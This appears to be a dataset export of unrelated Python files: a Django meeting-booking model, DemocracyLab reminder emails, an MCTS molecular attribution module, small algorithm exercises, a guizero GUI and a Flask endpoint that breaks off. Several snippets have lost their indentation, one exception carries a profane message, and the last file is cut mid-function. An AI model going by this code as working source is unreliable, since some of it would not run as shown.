text stringlengths 38 1.54M |
|---|
#! /usr/bin/env python
#coding=utf-8
from base.models import AppOperation
from django.db import models
from base.models import CachingModel
from base.operation import Operation,ModelOperation
from django.utils.translation import ugettext_lazy as _
from dbapp.datautils import filterdata_by_user
from base.middleware import threadlocals
from type import TypeForeignKey
from mysite.meeting.models.room import Room,RoomManyToManyFieldKey
#from room import Room,RoomForeignKey
import datetime
import re
# Yes/No choices for boolean-like model fields (1 = yes, 0 = no).
YESORNO = (
    (1, _(u'是')),
    (0, _(u'否')),
)
def get_endtime(self, starttime, continuetime):
    """Return the meeting end time: ``starttime`` plus ``continuetime`` minutes.

    Args:
        starttime: a ``datetime.time`` for the meeting start.
        continuetime: meeting duration in minutes (int).

    Returns:
        A ``datetime.time``. Meetings crossing midnight are not supported:
        the hour is clamped to 23 (mirrors the original cap at hour 23;
        the result is then not meaningful, but no error is raised).

    Note: the original implementation referenced an undefined name ``time``
    (only the ``datetime`` module is imported) and double-incremented the
    hour when ``continuetime`` was exactly 60; both are fixed here.
    """
    total_minutes = starttime.hour * 60 + starttime.minute + continuetime
    h, m = divmod(total_minutes, 60)
    if h > 23:
        h = 23  # clamp within the same day, mirroring the original cap
    return datetime.time(h, m, starttime.second)
class MeetingEntity(CachingModel):
    """A scheduled meeting: room, schedule, and check-in/check-out windows.

    save() enforces all booking rules (uniqueness, time ordering, room
    availability) by raising Exception with a localized message, and makes
    sure a StatisticsMeeting row exists for the meeting afterwards.
    """
    id = models.AutoField(db_column="id",primary_key=True,editable=False)  # Do not delete: meeting statistics rely on this attribute
    numberMeeting = models.CharField(verbose_name=_(u'会议编号'),max_length=20)
    nameMeeting = models.CharField(verbose_name=_(u'会议名称'), max_length=40,)
    typeMeeting =TypeForeignKey(verbose_name=_(u'会议室类型'),null=True,blank=True,editable=False)
    roomMeeting = models.ForeignKey(Room,verbose_name=_(u'会议室'), editable=True)
    startTime = models.DateTimeField(verbose_name=_(u'开始时间'))
    endTime = models.DateTimeField(verbose_name=_(u'结束时间'))
    lateAllow = models.IntegerField(verbose_name=_(u'允许迟到(分钟)'),default=0)
    leaveAllow = models.IntegerField(verbose_name=_(u'允许早退(分钟)'),default=0)
    startCheckInTime = models.DateTimeField(verbose_name=_(u'会议开始签到时间'))
    endCheckInTime = models.DateTimeField(verbose_name=_(u'会议结束签到时间'))
    startCheckOutTime = models.DateTimeField(verbose_name=_(u'会议开始签退时间'))
    endCheckOutTime = models.DateTimeField(verbose_name=_(u'会议结束签退时间'))
    remark = models.TextField(verbose_name=_(u'内容纪要'),blank=True,null=True)

    def __unicode__(self):
        # Display as "<number> <name>".
        return '%s %s' % (self.numberMeeting, self.nameMeeting)

    def save(self):
        """Validate every booking rule, persist, then ensure statistics row.

        Raises Exception (localized message) on the first violated rule.
        """
        # Local import avoids a circular import at module load time.
        from statisticsMeeting import StatisticsMeeting
        if len(self.numberMeeting)>20:
            raise Exception(_(u'会议编号长度不能超过20位有效字符'))
        if len(self.nameMeeting)>40:
            raise Exception(_(u'会议名称长度不能超过40个有效字符'))
        # Meeting number must be alphanumeric only.
        p = re.compile(r'^[a-zA-Z0-9]*$')
        if not p.match(self.numberMeeting):
            raise Exception(_(u"会议编号只能为数字或字母"))
        # Uniqueness checks only apply to newly created meetings (no id yet).
        ee = MeetingEntity.objects.filter(numberMeeting=self.numberMeeting)
        if len(ee)>0 and not self.id:
            raise Exception(_(u'会议编号已存在'))
        if not self.roomMeeting.isUse:
            raise Exception(_(u'会议室处于无法使用状态'))
        eNam = MeetingEntity.objects.filter(nameMeeting=self.nameMeeting)
        if not self.id and len(eNam) >0:
            raise Exception(_(u'会议名称已存在'))
        if self.endTime <= self.startTime:
            raise Exception(_(u'结束时间不应小于开始时间'))
        if self.startTime.day != self.endTime.day or (self.endTime - self.startTime).seconds/3600 >= 8:
            raise Exception(_(u'本系统暂不支持跨天或超过8小时的大型会议'))
        # NOTE(review): uses lateAllow twice; probably meant lateAllow + leaveAllow — confirm.
        if datetime.timedelta(minutes=(self.lateAllow+self.lateAllow))>=(self.endTime-self.startTime):
            raise Exception(_(u'允许迟到、早退设置不合理'))
        if self.startCheckInTime > self.startTime:
            raise Exception(_(u'开始签到时间不应大于会议开始时间'))
        if self.endCheckInTime <= (self.startTime + datetime.timedelta(minutes=(self.lateAllow))):
            raise Exception(_(u'结束签到时间不应小于或等于会议开始时间加允许迟到时间'))
        if self.startCheckOutTime > (self.endTime-datetime.timedelta(minutes=(self.leaveAllow))):
            raise Exception(_(u'开始签退时间不应大于会议结束时间减允许早退时间'))
        # NOTE(review): condition checks start > end, but the message reads
        # "start should not be less than end" — the wording looks inverted; confirm.
        if self.startCheckOutTime > self.endCheckOutTime:
            raise Exception(_(u'开始签退时间不应小于结束签退时间'))
        if self.endCheckInTime > (self.endTime-datetime.timedelta(minutes=(self.leaveAllow))):
            raise Exception(_(u'结束签到时间不应大于会议结束时间减允许早退时间'))
        if self.endCheckOutTime <= self.endTime:
            raise Exception(_(u'结束签退时间不应小于或等于会议结束时间'))
        if self.id:
            # Existing meetings may not change their number.
            mE = MeetingEntity.objects.get(id=self.id)
            if mE.numberMeeting != self.numberMeeting:
                raise Exception(_(u"会议编号不可修改"))
        # Room-conflict scan: O(n) over all meetings — checks whether either
        # endpoint of this meeting's check window falls inside another
        # meeting's window, or this window fully contains another's.
        meetingAll = MeetingEntity.objects.all()
        if len(meetingAll)>0 :
            for meeting in meetingAll :
                if self.roomMeeting == meeting.roomMeeting and self.numberMeeting != meeting.numberMeeting and self.startTime.date() == meeting.startTime.date() and self.startCheckInTime >= meeting.startCheckInTime and self.startCheckInTime <= meeting.endCheckOutTime:
                    raise Exception(_(u'该时间段内会议室已被占用'))
                if self.roomMeeting == meeting.roomMeeting and self.numberMeeting != meeting.numberMeeting and self.startTime.date() == meeting.startTime.date() and self.endCheckOutTime >= meeting.startCheckInTime and self.endCheckOutTime <= meeting.endCheckOutTime:
                    raise Exception(_(u'该时间段内会议室已被占用'))
                if self.roomMeeting == meeting.roomMeeting and self.numberMeeting != meeting.numberMeeting and self.startTime.date() == meeting.startTime.date() and self.startCheckInTime <= meeting.startCheckInTime and self.endCheckOutTime >= meeting.endCheckOutTime:
                    raise Exception(_(u'该时间段内会议室已被占用'))
        if self.id:
            # Editing: name may not collide with a different meeting's name.
            eNam = MeetingEntity.objects.filter(nameMeeting=self.nameMeeting)
            ee = MeetingEntity.objects.filter(numberMeeting=self.numberMeeting)
            if len(eNam)>0 and len(ee)>0 and ee[0].id != eNam[0].id:
                raise Exception(_(u'会议名称已存在'))
        super(MeetingEntity,self).save()
        # Create the statistics row on first save, if not present yet.
        me = MeetingEntity.objects.get(id=self.id)
        sMeeting = StatisticsMeeting.objects.filter(meetingID=me)
        if len(sMeeting)<1:
            sm = StatisticsMeeting()
            sm.meetingID = me
            sm.save()

    def delete(self):
        """Delete the meeting unless attendees are still attached."""
        from meeting_emp import MeetingEmp
        from statisticsMeeting import StatisticsMeeting
        m = MeetingEntity.objects.get(id=self.id)
        if len(MeetingEmp.objects.filter(meetingID=m))>0:
            raise Exception(_(u'会议中还有人员,不能删除'))
        super(MeetingEntity,self).delete()
        # NOTE(review): this lookup runs after the row was deleted, so .get()
        # presumably always raises and the StatisticsMeeting is never removed
        # — the cleanup should probably happen before super().delete(); confirm.
        try:
            me = MeetingEntity.objects.get(id=self.id)
            sm = StatisticsMeeting.objects.get(meetingID=me)
            sm.delete()
        except:
            pass

    class Admin(CachingModel.Admin):  # admin options for this model
        menu_group = 'meeting'  # app menu group this model appears under
        menu_index=3  # position within the menu
        query_fields=['numberMeeting','nameMeeting','roomMeeting.nameRoom','startTime','endTime']  # searchable fields
        # adv_fields=['code','datetime','type','startTime']
        list_display=['numberMeeting','nameMeeting','roomMeeting.nameRoom','startTime','endTime']  # columns shown in the list view
        sort_fields=['numberMeeting','startTime']  # sortable columns

    class Meta:
        verbose_name=_(u'会议')  # display name
        verbose_name_plural=verbose_name
        app_label= 'meeting'  # owning app
class MeetingForeignKey(models.ForeignKey):
    """A ForeignKey whose target model is always MeetingEntity."""

    def __init__(self, to_field=None, **kwargs):
        kwargs['to_field'] = to_field
        super(MeetingForeignKey, self).__init__(MeetingEntity, **kwargs)
class MeetingManyToToManyField(models.ManyToManyField):
    """A ManyToManyField whose target model is always MeetingEntity.

    (Class name kept verbatim — it is referenced by other modules.)
    """

    def __init__(self, *args, **kwargs):
        super(MeetingManyToToManyField, self).__init__(
            MeetingEntity, *args, **kwargs
        )
#
#def update_dept_widgets():
# from dbapp import widgets
# if MeetingManyToToManyField not in widgets.WIDGET_FOR_DBFIELD_DEFAULTS:
# from meeting_widget import ZDeptMultiChoiceWidget
# widgets.WIDGET_FOR_DBFIELD_DEFAULTS[MeetingManyToToManyField]= ZDeptMultiChoiceWidget
#
##update_dept_widgets()
|
""" This basically returns a list of all the palindromes from subsequences of a string"""
def get_palindromes_for_string(string: str):
if len(string) == 1:
return [string]
from pprint import pprint
def get_i_j(l:list):
len_l = len(l)
if len_l == 2:
return 0, 1
if len_l % 2 == 0:
return (len_l//2-1), len_l//2
else:
print(l)
raise Exception('What THE FUCKK>?')
incidence_matrix = []
for _ in range(len(string)):
incidence_matrix.append([False] * len(string))
matches = {0: []}
palindromes = []
for row_idx in range(len(incidence_matrix)):
for col_idx in range(len(incidence_matrix[row_idx])):
if row_idx != col_idx and string[row_idx] == string[col_idx] and row_idx < col_idx:
matches[0].append([row_idx, col_idx])
palindromes.append(string[row_idx] + string[col_idx])
for k in range(1, (len(string)//2)+1):
for pal in matches[k-1]:
i_idx, j_idx = get_i_j(pal)
f_i, f_j = pal[i_idx], pal[j_idx]
for o_pal in matches[0]:
i, j = o_pal[0], o_pal[1]
if i > f_i and j < f_j:
if k not in matches:
matches[k] = []
new_palindrome_indexes = pal[:i_idx+1] + [i, j] + pal[j_idx:]
matches[k].append(new_palindrome_indexes)
palindromes.append(''.join(string[p] for p in new_palindrome_indexes))
# matches[k].append([f_i, i, j, f_j])
if len(string) % 2 != 0 and string == string[::-1]:
palindromes.append(string)
return palindromes + list(string) |
# STACK클래스 생성
class Stack:
    """A minimal LIFO stack backed by a Python list.

    Interface quirks preserved from the original: ``empty()`` returns the
    ints 1/0 rather than a bool, ``pop()`` discards the top element without
    returning it (and is a no-op on an empty stack), and ``top()`` returns
    -1 when the stack is empty.
    """

    def __init__(self):
        self.myStack = []

    def push(self, n):
        self.myStack.append(n)

    def pop(self):
        # Silently ignore pops on an empty stack.
        if not self.empty():
            self.myStack.pop()

    def size(self):
        return len(self.myStack)

    def empty(self):
        return 1 if not self.myStack else 0

    def top(self):
        return -1 if self.empty() == 1 else self.myStack[-1]
def checkParen(p):
    """Return "YES" if the parenthesis string *p* is balanced, else "NO".

    Any non-'(' character is treated as a closing parenthesis (same as the
    original, which pushed only '(' and popped on everything else).

    Changes from the original: the unreachable trailing ``return "NO"``
    (dead code after an if/else that both return) is removed, and the
    hand-rolled Stack class is replaced by a simple depth counter.
    """
    depth = 0
    for c in p:
        if c == '(':
            depth += 1
        else:
            if depth == 0:
                # Closing paren with nothing open.
                return "NO"
            depth -= 1
    return "YES" if depth == 0 else "NO"
|
from django.conf import settings
from django.core.mail import EmailMessage
from django.core.management.base import BaseCommand
from django.utils import timezone
from common.helpers.constants import FrontEndSection
from common.helpers.front_end import section_path
from common.helpers.date_helpers import DateTimeFormats, datetime_field_to_datetime, datetime_to_string
from democracylab.emails import send_email,_get_account_from_email, send_volunteer_conclude_email, HtmlEmailTemplate, \
notify_project_owners_volunteer_concluded_email, EmailAccount
class Command(BaseCommand):
    """Management command: for every volunteer relation that is up for
    renewal, either conclude it (projected end date passed) or send the
    next renewal-reminder email."""

    def handle(self, *args, **options):
        if not settings.VOLUNTEER_RENEW_REMINDER_PERIODS:
            print('Please set VOLUNTEER_RENEW_REMINDER_PERIODS before running volunteer_renewal_reminders')
            return
        now = timezone.now()
        # Imported here, not at module level — presumably to avoid Django
        # app-loading order issues; confirm before moving.
        from civictechprojects.models import VolunteerRelation
        volunteer_applications = VolunteerRelation.objects.all()
        for volunteer_relation in volunteer_applications:
            if volunteer_relation.is_up_for_renewal(now):
                if now > volunteer_relation.projected_end_date:
                    # Engagement ended: notify (approved volunteers only),
                    # then remove the relation and refresh caches.
                    if volunteer_relation.is_approved:
                        # Don't send conclusion emails if volunteer wasn't approved
                        send_volunteer_conclude_email(volunteer_relation.volunteer, volunteer_relation.project.project_name)
                        notify_project_owners_volunteer_concluded_email(volunteer_relation)
                    # NOTE(review): source indentation was lost; deletion is
                    # assumed to happen regardless of approval (the comment
                    # above scopes only the emails) — confirm.
                    user = volunteer_relation.volunteer
                    volunteer_relation.delete()
                    volunteer_relation.project.recache()
                    user.purge_cache()
                elif volunteer_relation.is_approved:
                    # Don't send reminders if volunteer isn't approved
                    email_template = get_reminder_template_if_time(now, volunteer_relation)
                    if email_template:
                        send_reminder_email(email_template, volunteer_relation)
                        # Track reminder cadence on the relation itself.
                        volunteer_relation.re_enroll_reminder_count += 1
                        volunteer_relation.re_enroll_last_reminder_date = now
                        volunteer_relation.save()
def get_reminder_template_if_time(now, volunteer):
    """Return the reminder email template due for *volunteer*, or a falsy
    value when no reminder is due yet.

    The first reminder uses the first template immediately; subsequent
    reminders wait ``VOLUNTEER_RENEW_REMINDER_PERIODS[count]`` days after
    the previous one (a non-positive interval disables further reminders).

    Fix: the template index is now clamped like the interval index, so a
    volunteer whose reminder count exceeds the number of templates re-uses
    the last template instead of raising IndexError.
    """
    reminder_interval_days = settings.VOLUNTEER_RENEW_REMINDER_PERIODS
    if not volunteer.re_enroll_last_reminder_date:
        # Never reminded before: send the first template right away.
        return volunteer_reminder_emails[0]
    days_since_last_reminder = (now - volunteer.re_enroll_last_reminder_date).days
    days_to_next_reminder = reminder_interval_days[
        min(volunteer.re_enroll_reminder_count, len(reminder_interval_days) - 1)
    ]
    template_index = min(
        volunteer.re_enroll_reminder_count, len(volunteer_reminder_emails) - 1
    )
    # Falsy (False) when the reminder is disabled or not yet due.
    return (
        (days_to_next_reminder > 0)
        and (days_since_last_reminder >= days_to_next_reminder)
        and volunteer_reminder_emails[template_index]
    )
# TODO: Update for redis queue changes
def send_reminder_email(email_template, volunteer_relation):
    """Render *email_template* for the volunteer/project pair and send it
    from the volunteer email account."""
    project = volunteer_relation.project
    volunteer = volunteer_relation.volunteer
    # Template placeholders ({{first_name}}, {{project_name}}, ...) are
    # filled from this context by email_template.render below.
    context = {
        'first_name': volunteer.first_name,
        'project_name': project.project_name,
        'project_end_date': datetime_to_string(datetime_field_to_datetime(volunteer_relation.projected_end_date), DateTimeFormats.DATE_LOCALIZED),
        'volunteer_start_date': datetime_to_string(datetime_field_to_datetime(volunteer_relation.application_date), DateTimeFormats.DATE_LOCALIZED)
    }
    email_msg = EmailMessage(
        subject="You're making a difference at " + project.project_name,
        from_email=_get_account_from_email(EmailAccount.EMAIL_VOLUNTEER_ACCT),
        to=[volunteer.email],
    )
    email_msg = email_template.render(email_msg, context)
    send_email(email_msg, EmailAccount.EMAIL_VOLUNTEER_ACCT)
# Link volunteers follow to review/renew their commitment; the 'from' query
# parameter tags the visit as coming from the renewal notification email.
review_commitment_url = settings.PROTOCOL_DOMAIN + section_path(FrontEndSection.MyProjects, {'from': 'renewal_notification_email'})
def get_first_email_template():
    """Build the first renewal reminder: thank-you plus a renewal link."""
    template = HtmlEmailTemplate()
    template = template.header("You're making a difference at {{project_name}}")
    template = template.paragraph("Hi {{first_name}},")
    template = template.paragraph(
        "Thank you for your involvement with {{project_name}} since {{volunteer_start_date}}. "
        "We appreciate your contributions to this project!")
    template = template.paragraph("Your current volunteer commitment ends on {{project_end_date}}.")
    template = template.paragraph("However, we hope you'll consider extending your commitment and remaining a part of the DemocracyLab community.")
    return template.button(url=review_commitment_url, text="Review Volunteer Commitment")
def get_second_email_template():
    """Build the follow-up renewal reminder sent after the first one."""
    template = HtmlEmailTemplate()
    template = template.header("We appreciate your contributions to {{project_name}}")
    template = template.paragraph("{{first_name}},")
    template = template.paragraph(
        "You have been essential to the success of {{project_name}}."
        "Your volunteer commitment is coming to a close, "
        "but we hope you'll consider staying on and renewing your volunteer engagement.")
    template = template.paragraph("Thank you again for being a part of our tech-for-good community.")
    return template.button(url=review_commitment_url, text='Review Volunteer Commitment')
# Reminder templates indexed by reminder round (first nudge, then follow-up).
volunteer_reminder_emails = [get_first_email_template(), get_second_email_template()]
|
# Deployment configuration read from environment variables.
# Every variable is required: a missing one raises KeyError at import time,
# failing fast instead of running with a partial configuration.
from os import environ

MONGO_SERVER = environ['MONGO_SERVER']
MONGO_USER = environ['MONGO_USER']
MONGO_PASSWORD = environ['MONGO_PASSWORD']
CONTRACT_ADDRESS = environ['CONTRACT_ADDRESS']
APP_ADDRESS = environ['APP_ADDRESS']
CONTRACT_PROVIDER = environ['CONTRACT_PROVIDER']
|
from guizero import App , Text, PushButton,yesno, warn, info, MenuBar, Picture

# Main window for the "Trashbot" demo app.
app = App(title="trashbot ", height = 500, width = 700, bgcolor = "black")

# Welcome prompt: user opts in or the program exits.
join_the_trashbot= yesno("Welcome", "Do you want to join trashbot?")
if join_the_trashbot == True:
    info("Welcome", "Thank you!")
else:
    app.destroy()

message = Text(app, text="Join trashbot", color = "red")

def icon():
    # Callback for the robot button.
    print("start")

# Fix: the original passed the gif filename as `command=` (which must be a
# callable) and rebound the name `icon`, shadowing the function above.
# NOTE(review): assuming the gif was meant to be the button image — confirm.
icon_button = PushButton(app, command=icon, image="giftrobot.gif")

def edit_function():
    print("Edit option")

def file_function():
    print("File option")

# (A duplicate definition of edit_function was removed.)

menubar = MenuBar(app,
    toplevel=["Robot", "Contaminacion en el mundo", "ventajas del Trashbot","como podemos fomentar esto"],
    options=[
        [ ["mecanismo", file_function], ["electronica y programacion", file_function] ],
        [ ["cuanto afecta", edit_function], ["tipos de contaminacion", edit_function] ],
        [ ["Analiza y separa la basura", file_function], ["mantiene limpio el entorno", file_function] ],
        [ ["metodos de educacion ambiental", edit_function], ["En redes sociales ya que tienen demasiado impacto mundial", edit_function] ]
    ])

app.display()
|
Mouse = '''
class Mouse:
"""STOP!!! DON'T USE THIS UNLESS YOU'RE REALLY SURE YOU KNOW HOW TO USE IT!!
Nothing bad will happen, but it just won't really help you much. Peace.
"""
def __init__(self):
"""Mouse.__init__()"""
## button press things
self.justpressed = (0,0,0)
## visible
self.visible = True
@property
def pos(self): return py.mouse.get_pos()
@property
def x(self): return self.pos[0]
@property
def y(self): return self.pos[1]
@property
def arepressed(self): return py.mouse.get_pressed()
@property
def leftbutton(self): return self.arepressed[0]
@property
def scrollwheel(self): return self.arepressed[1]
@property
def rightbutton(self): return self.arepressed[2]
@property
def leftbuttonpressed(self): return self.justpressed[0]
@property
def scrollwheelpressed(self): return self.justpressed[1]
@property
def rightbuttonpressed(self): return self.justpressed[2]
def __setattr__(self, name, value) -> None:
"set self.name to value"
## These actually aren't pointless!
## These are the mouse things we can change in pygame
if name == 'justpressed':
self.__dict__['justpressed'] = value
elif name == 'visible':
py.mouse.set_visible(value)
elif name == 'pos':
py.mouse.set_pos(value)
elif name == 'x':
py.mouse.set_pos([value,self.y])
elif name == 'y':
py.mouse.set_pos([self.x,value])
else:
if name in self.__dict__:
raise AttributeError(f"You can't change Mouse attribute '{name}'")
else:
raise AttributeError(f"Mouse has no attribute '{name}'")
'''
|
import abc
import torch
from typing import Any, Callable, List, MutableMapping, Optional, Text, Tuple
import math
from functools import partial
from multiprocessing import Pool
import numpy as np
from rdkit import Chem
from rdkit import rdBase
from rdkit.Chem import AllChem
from rdkit import DataStructs
import os
import pickle
from MolRep.Explainer.Attribution.utils.fuseprop import find_clusters, extract_subgraph
from MolRep.Explainer.Attribution.utils.fuseprop.chemprop_utils import *
from MolRep.Explainer.Attribution.utils.gnn_utils import *
# Smallest atom set a search state may shrink to during MCTS pruning
# (mcts_rollout stops expanding below this).
MIN_ATOMS = 3
# Exploration constant in the PUCT selection bonus (see MCTSNode.U).
C_PUCT = 10
class MCTSNode():
    """One state in the Monte-Carlo tree search over molecule subgraphs.

    Attributes:
        smiles: SMILES string for this subgraph state.
        atoms: set of atom indices retained in this state.
        children: expanded child states.
        W, N, P: accumulated value, visit count, and prior score.
    """

    def __init__(self, smiles, atoms, W=0, N=0, P=0):
        self.smiles = smiles
        self.atoms = set(atoms)
        self.children = []
        self.W = W
        self.N = N
        self.P = P

    def Q(self):
        # Mean value of this node; 0 while unvisited.
        if self.N > 0:
            return self.W / self.N
        return 0

    def U(self, n):
        # PUCT exploration bonus, given total sibling visit count n.
        return C_PUCT * self.P * math.sqrt(n) / (1 + self.N)
class MCTS:
    """Attribution via Monte-Carlo tree search: finds small subgraph
    rationales whose model score stays at or above ``prop_delta``."""

    def __init__(self, name: Optional[Text] = None,
                 rollout=20, c_puct=10, max_atoms=15, min_atoms=3, prop_delta=0.3, ncand=1, ncpu=2):
        self.name = name or self.__class__.__name__
        self.rollout = rollout
        # NOTE(review): mcts_rollout/MCTSNode use the module-level C_PUCT,
        # min_atoms uses module-level MIN_ATOMS — these two attributes appear
        # unused by the search itself; confirm.
        self.c_puct = c_puct
        self.max_atoms = max_atoms
        self.min_atoms = min_atoms
        self.prop_delta = prop_delta
        self.ncand = ncand          # number of smallest rationales kept
        self.ncpu = ncpu

    def attribute(self, data, model, model_name, scaler=None):
        """Run the rationale search for one molecule batch item.

        Returns (node_weights, None, model_output_tuple); node_weights is a
        0/1 numpy array over the atoms of the input molecule.
        """
        # smiles, mol_batch, features_batch, atom_descriptors_batch = data
        # data = (mol_batch, features_batch, atom_descriptors_batch)
        smiles = data.smiles[0]
        output = model(data)
        if not isinstance(output, tuple):
            output = (output,)
        results = mcts_search(smiles, model, model_name, scaler,
                              rollout=self.rollout, max_atoms=self.max_atoms,
                              prop_delta=self.prop_delta, ncpu=self.ncpu)
        node_weights = self.get_attribution_results(smiles, results)
        return node_weights, None, output

    def get_attribution_results(self, smiles, results):
        """Mark (with 1) every atom covered by the ``ncand`` smallest rationales."""
        mol = Chem.MolFromSmiles(smiles)
        node_weights = np.zeros(len(mol.GetAtoms()))
        orig_smiles, rationales = results
        # Prefer the most parsimonious rationales (fewest atoms).
        rationales = sorted(rationales, key=lambda x:len(x.atoms))
        for x in rationales[:self.ncand]:
            mol = Chem.MolFromSmiles(orig_smiles)
            sub = Chem.MolFromSmiles(x.smiles)
            # Map rationale atoms back onto the original molecule.
            subgraph_truth = mol.GetSubstructMatch(sub)
            node_weights[list(subgraph_truth)] = 1
        return node_weights
def mcts_rollout(node, state_map, orig_smiles, clusters, atom_cls, nei_cls, scoring_function):
    """One MCTS rollout from *node*.

    On first visit, expands the node by deleting peripheral clusters/leaf
    atoms and scores the new states; then recurses into the child with the
    best Q + U value and backs the value up the path.

    Returns the value propagated upward (node.P at a terminal state).

    Change from the original: the debug ``print('cur_node', ...)`` was
    removed — it spammed stdout on every recursive call.
    """
    cur_atoms = node.atoms
    if len(cur_atoms) <= MIN_ATOMS:
        # Terminal: state is already as small as allowed.
        return node.P
    # Expand if this node has never been visited
    if len(node.children) == 0:
        # Clusters entirely contained in the current atom set.
        cur_cls = set( [i for i,x in enumerate(clusters) if x <= cur_atoms] )
        for i in cur_cls:
            # Atoms of cluster i that belong to no other remaining cluster.
            leaf_atoms = [a for a in clusters[i] if len(atom_cls[a] & cur_cls) == 1]
            if len(nei_cls[i] & cur_cls) == 1 or len(clusters[i]) == 2 and len(leaf_atoms) == 1:
                new_atoms = cur_atoms - set(leaf_atoms)
                new_smiles, _ = extract_subgraph(orig_smiles, new_atoms)
                if new_smiles in state_map:
                    new_node = state_map[new_smiles]  # merge identical states
                else:
                    new_node = MCTSNode(new_smiles, new_atoms)
                # Skip states whose subgraph extraction failed (empty smiles).
                if new_smiles:
                    node.children.append(new_node)
        state_map[node.smiles] = node
        if len(node.children) == 0: return node.P  # cannot find leaves
        # Score all fresh children in one batch.
        scores = scoring_function([x.smiles for x in node.children])
        for child, score in zip(node.children, scores):
            if np.array(score).ndim == 1:
                child.P = score
            else:
                # 2-D output: assumed probability matrix; use 1 - P(class 0)
                # — confirm against the scoring function's output shape.
                child.P = 1 - score[0][0]
    sum_count = sum([c.N for c in node.children])
    # PUCT selection: exploit high Q, explore low-visit / high-prior nodes.
    selected_node = max(node.children, key=lambda x : x.Q() + x.U(sum_count))
    v = mcts_rollout(selected_node, state_map, orig_smiles, clusters, atom_cls, nei_cls, scoring_function)
    selected_node.W += v
    selected_node.N += 1
    return v
def mcts(smiles, scoring_function, n_rollout, max_atoms, prop_delta):
    """Run *n_rollout* MCTS rollouts on one molecule.

    Returns (smiles, rationales): rationales are all visited states with at
    most *max_atoms* atoms and score P >= *prop_delta*.
    """
    mol = Chem.MolFromSmiles(smiles)
    clusters, atom_cls = find_clusters(mol)
    nei_cls = [0] * len(clusters)
    for i,cls in enumerate(clusters):
        # Neighbor clusters of i: every cluster sharing an atom with it,
        # excluding i itself.
        nei_cls[i] = [nei for atom in cls for nei in atom_cls[atom]]
        nei_cls[i] = set(nei_cls[i]) - set([i])
        clusters[i] = set(list(cls))
    # Convert per-atom cluster lists to sets for fast intersection.
    for a in range(len(atom_cls)):
        atom_cls[a] = set(atom_cls[a])
    # Root state keeps every atom of the molecule.
    root = MCTSNode(smiles, set(range(mol.GetNumAtoms())) )
    state_map = {smiles : root}
    for _ in range(n_rollout):
        mcts_rollout(root, state_map, smiles, clusters, atom_cls, nei_cls, scoring_function)
    rationales = [node for _,node in state_map.items() if len(node.atoms) <= max_atoms and node.P >= prop_delta]
    return smiles, rationales
def mcts_search(data, model, model_name, scaler=None,
                rollout=20, max_atoms=15, prop_delta=0.3, ncpu=4):
    """Run the MCTS rationale search for one SMILES string (*data*).

    NOTE(review): the multiprocessing path is commented out, so ``ncpu`` is
    currently unused and the search runs single-process — confirm intent.
    """
    scoring_function = get_scoring_function(model, model_name, scaler)
    # work_func = partial(mcts, scoring_function=scoring_function,
    #                     n_rollout=rollout,
    #                     max_atoms=max_atoms,
    #                     prop_delta=prop_delta)
    # pool = Pool(ncpu)
    # results = pool.map(work_func, data)
    results = mcts(smiles=data, scoring_function=scoring_function, n_rollout=rollout, max_atoms=max_atoms, prop_delta=prop_delta)
    return results
class chemprop_model():
    """Scoring-function wrapper around a chemprop-style model.

    (Lower-case class name kept: it is part of the public dispatch in
    get_scoring_function.)
    """

    def __init__(self, model, scaler=None):
        self.model = model
        self.scaler = scaler

    def __call__(self, smiles, batch_size=1):
        """Score a list of SMILES; invalid SMILES score 0.0.

        Returns a float32 numpy array aligned with the input list.
        """
        test_data = get_data_from_smiles(smiles=smiles)
        # Keep only parseable molecules for prediction.
        valid_indices = [i for i in range(len(test_data)) if test_data[i].mol is not None]
        full_data = test_data
        test_data = MoleculeDataset([test_data[i] for i in valid_indices])
        model_preds = predict(
            model=self.model,
            data=test_data,
            batch_size=batch_size,
            scaler=self.scaler
        )
        # Put zero for invalid smiles
        full_preds = [0.0] * len(full_data)
        for i, si in enumerate(valid_indices):
            full_preds[si] = model_preds[i]
        return np.array(full_preds, dtype=np.float32)
class gnn_model:
    """Scoring-function wrapper around a GNN model.

    (Lower-case class name kept: it is part of the public dispatch in
    get_scoring_function.)
    """

    def __init__(self, model, scaler=None):
        self.model = model
        self.scaler = scaler

    def __call__(self, smiles, batch_size=500):
        """Score a list of SMILES; invalid SMILES score 0.0.

        NOTE(review): ``batch_size`` is accepted but not forwarded to
        gnn_predict, and the device is hard-coded to 'cuda' — confirm.
        """
        test_data, valid_indices = get_gnn_data_from_smiles(smiles=smiles)
        model_preds = gnn_predict(
            model=self.model,
            test_data=test_data,
            scaler=self.scaler,
            device='cuda'
        )
        # Put zero for invalid smiles
        full_preds = [0.0] * len(smiles)
        for i, si in enumerate(valid_indices):
            full_preds[si] = model_preds[i]
        return np.array(full_preds, dtype=np.float32)
def get_scoring_function(model, model_name, scaler):
    """Function that initializes and returns a scoring function by name.

    Fix: an unrecognized *model_name* now raises ValueError immediately
    instead of silently returning None (which previously surfaced later as
    a confusing "'NoneType' is not callable" error).
    """
    if model_name in ['DMPNN', 'CMPNN']:
        return chemprop_model(model=model, scaler=scaler)
    if model_name in ['DGCNN', 'GIN', 'ECC', 'GraphSAGE', 'DiffPool', 'GraphNet', 'GAT', 'PyGCMPNN']:
        return gnn_model(model=model, scaler=scaler)
    raise ValueError('Unknown model name: %r' % (model_name,))
|
class Solution:
    def numSubarraysWithSum(self, A: List[int], S: int) -> int:
        """Count contiguous subarrays of the binary array *A* summing to S.

        Sliding window: for each right edge, shrink from the left while the
        window sum is >= S, counting the left positions where the sum hits S
        exactly; the counter is carried across zero-extensions and reset
        whenever a 1 enters the window.
        """
        left = 0
        window_sum = 0
        matching_starts = 0
        total = 0
        for right, value in enumerate(A):
            window_sum += value
            if value == 1:
                # A new 1 invalidates previously counted start positions.
                matching_starts = 0
            while left <= right and window_sum >= S:
                if window_sum == S:
                    matching_starts += 1
                window_sum -= A[left]
                left += 1
            total += matching_starts
        return total
import sys

# Make the parent directory importable so the local `roleplay` package
# (which provides `main`) resolves when this script runs from its own dir.
sys.path.append('../')
from roleplay import *

main.roleplayRun()
#main.IllustrationTest()
from flask import Blueprint
from flask import jsonify
from api.utils import get_zone_facts_select_columns
import logging
from flask_cors import cross_origin
def construct_filter_blueprint(name, engine):
    """Build a Flask blueprint exposing GET /api/filter/ which returns every
    project joined with its subsidies and ward/cluster/tract zone facts."""
    blueprint = Blueprint(name, __name__, url_prefix='/api')

    @blueprint.route('/filter/', methods=['GET'])
    @cross_origin()
    def filter_data():
        # Per-zone-type column lists are generated from the zone_facts
        # schema; assumed trusted (no request input reaches this SQL).
